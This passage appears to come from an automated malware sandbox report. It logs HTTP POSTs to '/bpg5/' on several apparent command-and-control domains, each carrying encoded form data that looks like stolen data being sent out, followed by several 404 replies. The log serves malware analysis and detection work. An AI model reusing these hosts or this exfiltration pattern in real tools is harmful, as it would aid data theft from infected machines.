39 4b 31 48 53 4e 79 4d 46 4a 66 77 44 72 67 4a 69 59 57 38 46 64 77 30 78 6b 37 5a 35 6e 48 6c 73 58 5a 79 70 59 78 67 58 28 70 61 78 52 4c 6d 57 6f 30 61 59 6f 62 34 30 63 33 7e 31 78 68 39 75 6e 5a 4e 37 36 4e 66 6a 4b 59 75 44 6e 49 67 63 30 79 7e 53 35 49 69 7a 6b 51 7a 32 35 4c 44 38 38 67 44 71 63 34 48 48 32 62 5a 63 37 74 53 79 48 68 28 76 57 4a 4a 44 71 54 30 44 46 6d 52 6b 33 6d 49 32 4c 32 4a 62 77 4c 4a 34 30 6d 63 50 72 57 68 48 75 47 67 70 31 47 78 49 68 6c 71 65 51 56 6c 6e 50 2d 30 36 37 50 5a 63 4d 66 33 62 7a 31 4b 41 56 68 62 72 63 61 57 6e 36 6d 37 36 50 31 36 38 6f 43 48 59 72 64 4
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.gomarketing.infoConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.gomarketing.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gomarketing.info/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 44 79 6f 41 79 78 62 48 57 46 78 78 41 61 4a 31 54 65 70 76 28 48 57 4b 57 48 75 41 6e 71 6b 76 44 45 4b 59 59 57 55 76 4a 70 52 66 4d 51 42 48 7a 77 63 46 4e 59 4e 52 77 54 64 58 67 63 55 77 52 31 4d 5a 76 36 49 77 61 5a 4d 32 72 32 58 2d 66 31 32 59 55 4d 4a 79 66 43 67 58 76 6a 5a 5a 77 6f 31 33 4d 50 7a 64 6f 47 6d 51 53 4d 58 36 78 64 4f 55 68 41 50 57 47 50 51 4b 70 59 4b 4c 38 54 58 4f 74 63 44 45 53 72 73 62 7a 4e 4c 2d 31 59 7e 46 50 44 6c 6d 31 56 37 52 6e 58 77 68 6e 57 59 35 4a 41 5a 47 38 56 6c 74 4c 4f 75 34 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8mBWmPn=DyoAyxbHWFxxAaJ1Tepv(HWKWHuAnqkvDEKYYWUvJpRfMQBHzwcFNYNRwTdXgcUwR1MZv6IwaZM2r2X-f12YUMJyfCgXvjZZwo13MPzdoGmQSMX6xdOUhAPWGPQKpYKL8TXOtcDESrsbzNL-1Y~FPDlm1V7RnXwhnWY5JAZG8VltLOu4pA).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.antalyabfe.comConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.antalyabfe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.antalyabfe.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 56 78 65 79 75 6c 56 4b 50 56 4d 64 50 50 62 7e 6a 7a 5a 44 70 4b 77 52 6c 61 4b 76 43 57 37 69 6e 45 4c 50 5f 48 2d 6a 72 5a 56 38 7a 76 73 57 5f 4a 77 73 75 65 4a 7a 34 6f 4e 4f 49 28 4a 74 30 52 2d 4b 4a 45 7a 47 41 4d 54 57 64 57 48 53 73 54 79 34 70 6e 4d 63 44 53 35 5a 6f 49 69 65 55 7a 36 4e 6f 49 56 31 6e 4b 38 58 31 79 41 65 66 63 72 50 35 67 4c 7e 34 42 6f 41 4c 4a 6b 42 6b 4a 41 7a 4c 32 67 50 49 71 7a 76 54 4b 4d 73 72 48 33 41 69 69 79 37 43 6e 66 33 56 52 6d 38 57 7a 69 28 33 6d 6f 4a 37 41 4a 58 64 70 6d 4e 41 7e 7a 38 31 35 49 53 30 67 58 52 4d 54 55 59 33 4b 37 51 55 39 70 46 44 4d 6f 38 7a 66 52 30 7a 61 43 68 6d 4c 55 36 73 31 4b 6a 35 62 37 46 54 64 69 69 4a 47 4b 6d 59 75 68 6e 37 73 76 31 38 68 64 78 38 6d 77 7a 33 39 49 77 49 52 65 35 69 38 58 67 62 49 42 54 75 6e 2d 4d 38 6a 37 58 39 74 79 70 38 57 46 33 62 71 68 63 76 4c 4f 6d 69 6d 4a 42 61 64 31 43 58 79 6a 79 49 78 44 39 44 45 4d 28 2d 64 67 58 2d 4d 37 53 66 69 54 67 50 4e 6d 6b 50 43 56 4b 37 42 71 4a 5a 37 76 76 31 6d 42 64 75 51 35 59 59 74 39 6a 71 69 71 44 54 53 63 64 48 73 57 4f 58 65 78 42 34 37 4f 65 65 33 52 61 4b 76 59 55 51 62 5a 4c 4b 37 46 67 38 44 4d 39 7a 55 73 6d 32 4b 76 59 51 4c 4c 77 69 75 6c 62 37 68 56 41 4b 62 59 74 4a 55 34 68 69 48 7a 48 51 65 42 4e 4a 46 66 6a 48 74 4d 77 59 74 45 79 6c 6f 62 65 4a 71 49 6f 71 66 75 4f 44 43 4d 7a 38 53 50 74 34 36 31 47 79 6c 59 7a 79 66 67 56 56 67 74 4a 73 46 50 33 6c 67 37 46 54 42 53 71 72 63 37 4d 51 45 37 66 77 55 7a 64 31 44 72 6b 6f 6a 4a 54 46 65 33 4d 50 34 6b 7e 38 51 59 4d 38 32 39 73 76 71 59 4a 37 5a 74 4b 66 77 6b 6b 31 71 6b 42 48 4e 71 4c 39 68 42 50 6c 79 70 79 5a 6c 31 39 5f 59 62 6e 64 48 61 70 51 4f 59 33 38 72 77 31 75 28 70 79 49 66 66 31 64 62 6b 6a 4a 6f 48 69 79 63 32 73 35 49 71 33 56 61 37 4e 48 6a 75 75 31 59 78 61 73 49 36 4e 50 51 53 52 62 49 48 76 65 30 79 6d 74 73 6c 4b 62 28 52 6d 33 30 6d 37 45 4f 62 36 4e 33 43 51 51 44 44 64 79 35 63 41 35 78 55 70 31 6d 66 4b 6d 70 34 28 6c 7a 61 58 4d 77 58 77 7a 34 45 57 55 56 41 73 55 63 44 78 33 41 47 45 4e 39 44 42 5f 4c 30 32 4b 7a 74 36 48 44 62 4e 57 5a 62 4c 32 32 51 54 77 48 38 7e 39 36 70 78 62 72 61 46 38 7a 76 70 5a 30 41 37 47 65 61 45 76 61 4e 58 59 49 53 4c 77 58 43 56 45 4b 48 48 64 64 39 31 66 79 71 51 63 65 51 72 6d 78 35 51 42 77 75 6c 54 4d 70 44 6f 57 52 38 62 7a 5a 35 73 74 34 45 59 71 38 61 66 68 57 5a 54 55 73 44 68 63 64 33 30 61 76 35 66 58 70 69 67 76 58 6d 53 39 44 4d 4d 63 46 32 56 4d 2d 61 54 4d 63 36 67 7a 6d 6e 69 6d 49 51 34 66 4c 56 65 71 79 7
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.antalyabfe.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.antalyabfe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.antalyabfe.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 38 47 70 58 4f 52 53 76 43 6e 31 5f 6b 55 78 65 79 5f 6c 56 4d 76 56 4d 65 50 50 62 72 54 7a 62 44 70 48 4e 52 6b 76 52 76 30 79 37 68 79 6f 4c 50 4d 76 2d 6b 72 5a 55 30 54 76 6f 59 66 4a 68 73 75 66 71 7a 36 38 4e 4f 49 37 4a 72 53 64 2d 66 59 45 77 4f 51 4d 56 64 39 57 45 53 74 75 4d 34 70 6a 6d 63 44 36 35 5a 75 49 69 66 55 44 36 47 72 77 56 67 48 4b 36 52 31 79 74 65 66 51 36 50 34 4d 39 7e 34 56 6f 41 36 56 6b 42 31 70 41 32 63 61 67 47 6f 71 79 37 6a 4c 2d 6f 5a 72 37 45 42 62 44 79 6a 37 41 70 78 45 48 71 6c 69 71 6c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8mBWmPn=8GpXORSvCn1_kUxey_lVMvVMePPbrTzbDpHNRkvRv0y7hyoLPMv-krZU0TvoYfJhsufqz68NOI7JrSd-fYEwOQMVd9WEStuM4pjmcD65ZuIifUD6GrwVgHK6R1ytefQ6P4M9~4VoA6VkB1pA2cagGoqy7jL-oZr7EBbDyj7ApxEHqliqlw).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.jhg61.comConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.jhg61.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jhg61.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 6b 4d 7a 56 7a 76 66 53 45 47 53 6f 36 5f 61 65 41 38 63 71 79 48 77 66 63 79 59 4b 6d 33 57 50 43 69 73 6a 51 72 47 64 6c 42 6c 56 64 37 41 75 78 6a 6e 67 54 44 48 4e 36 41 6b 70 75 77 30 56 78 52 7e 6f 70 55 64 49 70 4c 72 4c 59 53 48 47 68 57 41 4c 6d 7a 33 6b 63 49 77 75 53 65 66 63 77 6b 58 5f 6c 69 49 54 79 76 41 2d 73 75 58 61 79 4a 6b 41 34 2d 65 57 4b 4c 58 68 4c 68 48 46 59 47 79 73 52 66 47 63 41 4d 71 58 4d 56 6b 43 67 71 4a 57 42 49 7e 31 4e 71 41 70 51 41 35 42 52 74 46 6b 4d 75 51 61 47 37 59 69 45 54 56 32 6f 4e 54 41 77 5f 70 7a 52 5a 71 52 6d 4e 36 59 5a 33 67 48 74 34 6b 33 4e 57 75 49 50 72 38 77 70 61 70 7a 7a 43 35 36 6b 41 44 6d 46 59 32 53 55 64 78 7a 66 64 4a 34 30 43 64 7a 68 52 38 2d 76 48 59 66 38 59 36 74 78 64 45 33 62 49 42 48 61 69 33 73 62 52 34 6f 33 49 28 52 45 70 6d 66 39 72 69 73 67 49 57 53 33 79 73 5a 63 50 4e 36 52 37 55 59 7e 73 55 34 30 55 58 44 55 36 54 34 31 70 55 34 72 53 37 35 59 4e 71 69 37 68 71 54 67 39 4a 30 6c 56 71 57 50 59 41 76 55 64 4b 48 35 6a 71 39 41 51 32 6b 4d 4d 38 32 4a 6a 58 63 62 78 46 64 74 6b 34 43 6c 4e 37 45 43 46 46 30 31 6b 42 7a 53 67 47 61 59 53 55 6f 4f 36 62 55 47 61 31 77 30 6d 30 57 69 33 62 4c 30 77 68 46 74 68 42 62 36 42 34 33 4e 67 74 37 45 76 70 79 59 66 71 36 28 7a 28 44 6b 71 6d 41 57 38 57 30 50 77 6c 50 57 74 6d 53 35 57 32 52 56 49 7a 30 34 64 6a 67 6a 6d 4f 4b 59 4f 52 69 36 5a 37 42 4a 63 37 30 4b 5a 6e 5f 68 51 62 67 4a 74 61 68 46 2d 5a 6a 28 58 6c 41 6c 42 56 4d 35 63 52 53 6f 52 79 48 73 4c 78 52 36 41 4d 38 54 43 28 52 61 2d 59 62 56 58 36 72 57 45 67 51 74 75 6a 76 64 53 77 35 76 63 4a 6b 48 71 51 46 58 71 76 4f 36 42 54 62 7a 4e 38 49 7a 7a 6a 55 6a 70 6a 6c 38 72 44 48 4e 78 54 76 77 7a 6e 62 33 6f 78 4c 55 6e 45 72 45 67 38 54 43 30 28 30 56 36 6a 49 55 6d 55 58 37 6d 69 33 5a 50 44 73 7e 4d 64 6c 64 72 51 4d 43 35 4e 6b 65 65 6b 34 4f 73 71 6c 48 53 51 2d 37 76 56 6c 30 48 64 61 4b 44 47 65 32 32 55 74 4b 38 72 35 49 69 4d 36 52 6c 39 32 78 4e 76 35 72 68 77 39 4f 37 61 7a 58 55 73 33 37 55 41 5a 74 57 73 43 7a 6e 79 68 48 4b 65 46 4f 78 73 41 7a 31 75 79 53 76 4c 41 61 4e 4e 44 54 62 47 4c 51 38 4c 71 45 7a 6c 34 59 54 79 33 45 61 49 65 51 43 47 59 58 4d 32 77 7e 34 35 67 7e 45 6b 74 51 74 36 31 4d 63 35 4e 52 4e 59 61 30 63 66 62 79 39 79 49 6b 62 38 47 70 5f 61 41 61 67 38 39 57 31 61 33 6e 6c 4c 78 77 6d 43 47 6d 39 54 61 71 52 48 75 51 52 4b 52 38 30 44 2d 32 71 61 58 45 5f 6f 68 77 5f 75 4b 34 75 36 54 66 79 72 75 77 6e 58 4c 71 66 65 42 7e 6c 57 50 46 32 62 37 4d 59 47 45 34 47 63 73 35 56 54 57 32 7a 37 4c 4c 66 43 4f 32 37 73 45 74 6
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.rt66omm.comConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.rt66omm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rt66omm.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 49 46 38 54 48 30 74 43 62 68 34 68 71 56 58 7a 77 55 7a 37 6d 33 66 4a 45 7e 70 48 4e 41 69 73 47 46 72 4a 42 31 53 72 64 78 39 68 31 6a 6b 59 4b 28 38 54 4e 50 6a 28 6e 35 57 33 6a 55 4c 34 58 68 4f 6d 36 64 33 47 50 57 2d 71 58 34 43 76 45 4c 42 64 73 74 65 4a 4c 4c 69 31 70 4b 43 31 47 4c 2d 6c 37 76 70 75 6d 4e 4e 48 56 74 53 76 6f 6e 4a 34 43 4e 4b 69 72 51 5f 51 58 57 51 49 63 64 62 61 67 44 6c 49 72 64 41 6d 33 5a 63 37 65 43 4e 6c 2d 62 43 33 55 4f 37 6c 43 4e 52 36 6d 43 6a 35 43 53 36 6d 50 71 72 37 59 4f 6f 6c 67 4b 48 54 58 6a 62 63 34 49 50 61 2d 69 4b 74 4e 69 5f 47 48 4b 6e 52 59 70 4d 4e 43 51 5f 38 71 50 31 4e 55 4f 53 50 51 73 43 4b 43 6a 6e 4e 50 35 51 68 55 53 65 46 56 30 74 52 47 45 34 55 46 76 61 4a 6d 72 47 61 31 61 65 77 68 75 69 56 65 61 6f 64 50 32 44 33 51 32 7a 31 45 47 6c 61 74 4a 66 7e 33 4d 38 47 62 43 44 51 6c 4d 4d 46 38 53 77 76 39 5a 7a 6f 56 42 61 5a 61 45 4d 35 34 65 30 44 57 67 55 56 5f 6c 64 6e 75 57 34 44 50 30 4d 54 70 48 72 49 69 51 53 65 49 61 49 36 43 33 49 41 79 4a 71 36 65 28 5a 31 65 63 71 4e 46 31 58 41 6c 36 2d 57 79 41 5f 45 49 53 36 36 35 71 53 50 33 48 57 4c 66 64 63 51 55 45 53 7a 73 52 76 50 51 43 70 33 56 42 6a 39 46 28 49 4b 4b 54 68 66 39 75 4a 79 6e 4e 47 57 72 36 58 50 50 45 32 76 78 5a 56 7e 47 42 66 63 34 42 37 28 67 41 61 37 51 63 5a 74 70 30 5a 4a 7a 72 6f 55 34 71 4d 36 62 56 52 31 35 36 50 4e 46 41 4a 74 77 44 75 69 4e 31 4f 32 39 72 74 61 71 36 63 41 36 34 70 57 76 6e 4e 64 37 38 56 52 76 51 30 4a 77 35 46 46 48 51 43 47 67 37 69 66 45 52 41 4f 72 6b 65 6c 68 75 4d 37 2d 43 41 65 30 35 63 4a 63 7e 2d 38 68 66 4c 54 54 6b 32 66 72 65 74 54 64 39 45 45 54 43 32 6b 45 45 37 37 45 67 77 41 65 70 77 64 72 65 4a 49 39 6e 4a 50 6d 43 7a 32 65 74 45 63 37 49 45 63 62 30 6f 6d 49 63 51 52 4d 48 64 30 4e 6d 79 65 61 51 6f 77 69 47 42 48 56 6d 4f 34 5a 59 51 64 79 39 71 58 34 65 30 6a 4e 50 73 34 72 42 52 35 36 6f 54 32 73 44 78 70 2d 42 33 67 76 39 4e 65 39 66 34 36 66 37 4f 62 61 76 43 44 51 76 49 62 76 58 49 38 73 45 2d 53 45 36 50 34 43 6b 39 74 6a 58 74 6b 4a 30 48 6b 65 53 70 58 55 6b 75 6c 38 6e 4d 79 62 72 75 59 4f 69 53 7e 72 59 52 4d 45 50 4f 65 57 45 6a 54 30 6b 54 36 56 30 5a 43 74 34 41 4d 74 78 71 58 4f 6e 38 59 7a 6a 53 54 58 56 79 44 77 44 65 39 38 6b 6d 49 61 32 5f 76 59 4b 52 4f 61 7a 6c 6b 63 51 30 69 6a 66 51 44 72 42 59 67 75 69 46 7a 61 41 4f 48 2d 75 6d 33 61 74 5a 74 34 33 31 4f 69 30 56 4f 76 37 39 34 63 4f 78 69 48 71 4d 66 32 55 42 52 6f 44 56 44 6f 6e 52 5a 32 36 74 54 42 67 6c 76 50 76 70 4c 33 50 72 4c 64 6f 3
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.rt66omm.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.rt66omm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rt66omm.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 50 35 38 42 6d 30 74 43 37 68 34 74 4b 56 58 35 51 55 31 37 6d 37 68 4a 46 36 66 48 2d 51 69 76 58 31 72 4a 54 4e 53 73 64 78 36 70 56 6a 67 48 61 28 74 54 4e 4f 43 28 6c 74 57 33 6a 51 4c 35 31 4a 4f 67 37 64 30 45 5f 57 38 6d 33 34 50 76 45 48 49 64 73 68 4f 4a 4c 6a 69 31 73 43 43 30 46 6a 2d 6a 65 62 70 37 47 4e 78 4d 31 73 51 76 6f 71 54 34 43 39 34 69 6f 45 5f 51 47 61 51 4a 4a 68 62 65 33 33 6c 42 4c 64 4e 72 58 5a 4b 77 63 4c 44 78 39 7e 59 38 45 7e 4f 73 58 70 41 30 6c 48 30 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8mBWmPn=bnjuuu8f3kRfdP58Bm0tC7h4tKVX5QU17m7hJF6fH-QivX1rJTNSsdx6pVjgHa(tTNOC(ltW3jQL51JOg7d0E_W8m34PvEHIdshOJLji1sCC0Fj-jebp7GNxM1sQvoqT4C94ioE_QGaQJJhbe33lBLdNrXZKwcLDx9~Y8E~OsXpA0lH06Q).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.haynicorpon.bizConnection: closeContent-Length: 1485Cache-Control: no-cacheOrigin: http://www.haynicorpon.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.haynicorpon.biz/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 33 7e 30 73 38 58 67 52 44 6a 58 54 33 52 75 47 6b 67 66 32 30 49 50 78 77 33 65 7e 68 4e 5f 44 63 4e 4c 65 35 50 4f 36 4e 72 36 43 5a 33 33 71 66 31 38 4c 34 4e 75 49 42 50 43 36 2d 35 34 28 4b 49 6f 65 61 76 49 44 5a 4a 58 47 77 6b 31 39 36 57 43 32 55 58 68 45 41 54 6d 68 75 71 39 6f 4b 4a 74 77 68 5a 2d 59 71 6d 37 6d 58 59 37 71 75 49 54 73 6e 30 47 58 75 34 39 36 4c 45 50 34 59 4a 34 59 79 4c 4d 6f 64 78 36 6f 71 53 6e 38 50 56 36 75 65 71 64 70 68 33 6e 50 63 48 45 41 55 57 37 4a 39 45 6c 63 35 72 4a 70 78 55 52 74 73 52 4c 35 59 67 67 55 73 39 4c 66 33 59 36 45 61 36 77 6e 36 6a 6c 71 30 39 49 58 36 33 34 66 63 48 39 64 43 4f 47 72 34 52 77 6a 45 4d 31 36 58 63 38 53 61 57 43 67 64 53 4a 70 6e 38 37 55 4e 65 72 36 71 51 57 63 4f 53 51 54 67 36 76 6d 57 79 61 39 6c 5a 77 39 55 75 76 36 53 53 4d 56 57 41 6f 51 4d 63 47 50 48 28 2d 6b 63 33 6e 76 62 52 79 57 35 44 6d 75 49 49 31 36 58 46 4d 78 6d 55 63 47 74 50 4a 55 6b 6c 57 43 4f 73 4c 45 4a 28 7a 75 5a 6a 52 6b 49 6c 44 71 36 64 35 32 67 34 65 59 2d 38 71 39 32 5a 72 55 46 46 38 65 6d 62 4d 47 56 52 33 48 41 71 75 52 47 59 43 49 49 37 4f 44 61 44 5f 47 58 56 67 30 4e 6c 53 63 38 50 73 38 2d 65 30 4c 4d 65 56 47 32 46 4c 6e 32 47 55 72 31 56 36 4d 61 28 66 6f 52 6e 79 6d 77 66 43 63 73 4c 2d 39 59 7a 6c 37 76 75 47 6b 61 44 72 4b 73 4d 52 55 42 57 76 30 43 4a 33 38 49 55 77 45 35 66 4d 71 78 78 4a 72 4d 74 39 50 72 43 59 4a 73 64 31 73 75 68 32 4e 78 7e 54 73 6a 4d 58 5a 71 41 4c 32 38 32 76 39 36 56 6f 39 58 66 75 36 79 39 75 39 4c 76 46 37 57 5a 7a 6f 33 55 77 57 78 37 61 7a 34 73 75 6f 4e 52 4e 71 73 72 50 4d 66 7a 31 44 51 6d 31 6b 6f 58 36 78 48 7e 44 53 41 44 48 66 44 32 68 47 33 38 2d 52 4a 4d 41 61 45 6e 2d 7e 54 59 62 46 71 57 56 4b 6c 4f 4d 76 73 62 6e 78 66 76 37 73 69 6f 76 39 68 58 6b 73 6b 58 66 66 44 59 42 6b 5f 44 57 44 33 37 2d 34 54 6f 44 56 77 38 74 70 64 70 32 47 59 4e 79 35 6e 69 4d 49 44 55 58 72 5f 48 49 30 5a 64 6b 55 41 53 56 59 33 32 6d 53 32 46 7a 6d 74 56 54 39 57 61 76 4d 33 65 4d 4b 4f 58 6b 4a 35 6f 4b 54 59 74 52 6c 76 28 62 61 56 4c 4c 62 62 6d 69 63 57 36 6f 31 76 36 4e 62 45 33 38 38 62 34 71 68 6d 4d 39 66 62 6a 70 66 50 28 66 7e 33 6d 6f 61 4a 49 4b 54 66 54 4b 45 45 7e 58 61 2d 59 55 59 70 68 4f 36 47 58 7a 36 5a 48 76 4a 47 4d 73 58 64 56 79 76 5a 67 2d 73 7a 53 42 48 6e 31 6d 45 54 6d 44 6f 33 63 35 79 50 44 64 79 53 57 2d 75 6e 74 43 6e 61 31 77 33 4c 37 33 51 31 28 77 6f 74 4b 6b 65 48 73 2d 65 65 65 56 55 46 36 75 58 5a 4d 46 6a 79 49 4f 34 43 39 6b 38 67 76 6d 77 45 56 43 79 76 4d 7
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.haynicorpon.bizConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.haynicorpon.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.haynicorpon.biz/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 6d 42 57 6d 50 6e 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 30 57 30 74 74 58 67 54 6a 6a 58 55 33 52 75 4a 45 67 56 32 30 45 48 78 78 44 4f 7e 57 52 5f 44 4e 39 4c 4c 62 6e 4f 35 4e 72 39 4e 35 32 2d 6b 5f 31 54 4c 34 4e 36 49 44 62 43 36 36 70 34 35 6f 77 6f 59 65 62 50 63 35 4a 43 4e 51 6b 34 39 36 61 68 32 55 4c 71 45 41 37 6d 68 73 7e 39 72 4b 5a 74 32 45 74 2d 4a 4b 6d 48 78 48 59 67 71 75 30 43 73 6e 45 34 58 71 41 39 36 36 49 50 34 6f 70 34 66 6a 4c 4d 39 4e 78 37 77 36 54 79 33 64 45 43 6a 72 37 38 75 69 44 71 4d 70 37 4b 42 31 76 52 4b 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8mBWmPn=J3NkxvfAm2TL40W0ttXgTjjXU3RuJEgV20EHxxDO~WR_DN9LLbnO5Nr9N52-k_1TL4N6IDbC66p45owoYebPc5JCNQk496ah2ULqEA7mhs~9rKZt2Et-JKmHxHYgqu0CsnE4XqA966IP4op4fjLM9Nx7w6Ty3dECjr78uiDqMp7KB1vRKw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 19 May 2023 15:51:10 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:51:21 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:51:24 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 May 2023 15:51:26 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 